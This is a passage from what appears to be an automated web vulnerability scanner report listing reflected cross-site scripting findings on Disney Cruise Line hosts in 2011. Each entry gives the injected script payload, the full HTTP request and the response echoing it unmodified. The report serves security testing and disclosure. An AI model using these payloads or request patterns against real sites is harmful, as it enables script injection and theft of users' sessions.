Path:   /media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae3c"><script>alert(1)</script>10a0dd7f9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaeae3c"><script>alert(1)</script>10a0dd7f9ea/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:08 GMT
Content-Length: 33412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaeae3c"><script>alert(1)</script>10a0dd7f9ea/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png" />
...[SNIP]...

5.25. http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b3"><script>alert(1)</script>2d4a37d68e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media3b6b3"><script>alert(1)</script>2d4a37d68e9/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:15 GMT
Content-Length: 32976
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media3b6b3"><script>alert(1)</script>2d4a37d68e9/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico" />
...[SNIP]...

5.26. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bc0d"><script>alert(1)</script>d4674076468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3bc0d"><script>alert(1)</script>d4674076468/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:32 GMT
Content-Length: 102688
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/3bc0d"><script>alert(1)</script>d4674076468/concat/2.39.0.9/css" />
...[SNIP]...

5.27. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e4d"><script>alert(1)</script>38a959cfdd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f8e4d"><script>alert(1)</script>38a959cfdd4/concat/2.39.0.9/js?files=/dewey/2.5.1/build/yui/selector/selector-beta-min.js,/dewey/2.5.1/build/yui/datasource/datasource-min.js,/dewey/2.5.1/build/yui/container/container-min.js,/dewey/2.5.1/build/yui/menu/menu-min.js,/dewey/2.5.1/build/yui/autocomplete/autocomplete-min.js,/dewey/2.5.1/build/yui/json/json-min.js,/dewey/2.5.1/build/yui/logger/logger-min.js,/dewey/2.5.1/build/yui/tabview/tabview-min.js,/dewey/2.5.1/build/yui/history/history-min.js,/dewey/2.5.1/build/yui/slider/slider-min.js,/global/stringUtils.js,/global/validators.js,/global/formUtils.js,/global/codeRegistry.js,/global/tools.js,/_lib/buttons/buttons.js,/_lib/analytics/analytics.js,/global/effects/effects.js,/global/async/errors.js,/global/async/pollingConnection.js,/global/async/ajaxRequest.js,/global/async/pleaseWait.js,/global/forms/abandonForms.js,/global/forms/formValidator.js,/global/forms/fieldValidations.js,/global/partyMixHandler.js,/global/animation/animation.js,/global/animation/sequencer.js,/global/categoryChangeHandler.js,/global/swfobject.js,/_lib/analytics/omniture/s_code.js,/_lib/tools/testAndTarget/mbox.js HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:11 GMT
Content-Length: 102687
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/f8e4d"><script>alert(1)</script>38a959cfdd4/concat/2.39.0.9/js" />
...[SNIP]...

5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of the &qqElement request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5b1'%3balert(1)//e077333c670 was submitted in the &qqElement parameter. This input was echoed as ed5b1';alert(1)//e077333c670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuoteed5b1'%3balert(1)//e077333c670&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: Close
Content-Length: 194169
Content-Type: text/javascript; charset=iso-8859-1
Pragma: cache
Server: barista/3.3.5
Cache-Control: max-age=1200
Expires: Mon, 16 May 2011 01:44:43 GMT
Date: Mon, 16 May 2011 01:24:43 GMT
Connection: close

/*<script>*/
/*
* This module purposely does not bog the client down with null continuous checks due to initial checks.
* No client-side JavaScript should be modifying the HTML QQ DOM, unless you wa
...[SNIP]...
ange the event function to include a safe zone
                                       // for the calendar button image as well
       'qqCalendars': Array(),            // array of all available calendar objects
       'qqElement': 'DisneyQuickQuoteed5b1';alert(1)//e077333c670',    // the qq container element ID, as a string
       'qqTravelMinLength': Array(),    // array of integers for minimum travel length; ID matches the calendar it
                                       // interfaces with, e.g. qqTravelMinL
...[SNIP]...

5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6089a"><script>alert(1)</script>4b7e2c4925d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6089a"><script>alert(1)</script>4b7e2c4925d/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:22 GMT
Content-Length: 102620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/6089a"><script>alert(1)</script>4b7e2c4925d/en_US/htmlQQ/jsQuickQuote" />
...[SNIP]...

5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30002<script>alert(1)</script>5fbba82f226 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote</BODY></HTML>

5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61d5d<script>alert(1)</script>9f047ac3d3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /services/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 162
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:27 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote</BODY></HTML>

5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b72b1<script>alert(1)</script>958bd4aec04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:33 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote</BODY></HTML>

5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5943d<script>alert(1)</script>ffb20f66d15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:37 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15</BODY></HTML>

5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9cd"><script>alert(1)</script>170eaf02e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concatac9cd"><script>alert(1)</script>170eaf02e31/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:15 GMT
Content-Length: 102613
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concatac9cd"><script>alert(1)</script>170eaf02e31/4.39.1.5/css" />
...[SNIP]...

5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ad"><script>alert(1)</script>4d3fe98385e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concat/4.39.1.59c6ad"><script>alert(1)</script>4d3fe98385e/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:24 GMT
Content-Length: 33368
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concat/4.39.1.59c6ad"><script>alert(1)</script>4d3fe98385e/css" />
...[SNIP]...

5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd5"><script>alert(1)</script>138273281c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concat/4.39.1.5/css1fdd5"><script>alert(1)</script>138273281c3?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:47 GMT
Content-Length: 33368
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concat/4.39.1.5/css1fdd5"><script>alert(1)</script>138273281c3" />
...[SNIP]...

5.37. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae94"><script>alert(1)</script>eac3162730f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media3ae94"><script>alert(1)</script>eac3162730f/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:08 GMT
Content-Length: 102647
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media3ae94"><script>alert(1)</script>eac3162730f/dcl_v0400/Global/Promo/220x102/commerce-DVD.png" />
...[SNIP]...

5.38. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef40"><script>alert(1)</script>f5657d3ea61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media1ef40"><script>alert(1)</script>f5657d3ea61/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png?t=1285273957650 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:00 GMT
Content-Length: 33412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media1ef40"><script>alert(1)</script>f5657d3ea61/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png" />
...[SNIP]...

5.39. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/content-Videos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1bc9"><script>alert(1)</script>077b2728ef3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaa1bc9"><script>alert(1)</script>077b2728ef3/dcl_v0400/Global/Promo/220x102/content-Videos.png?t=1285273956040 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
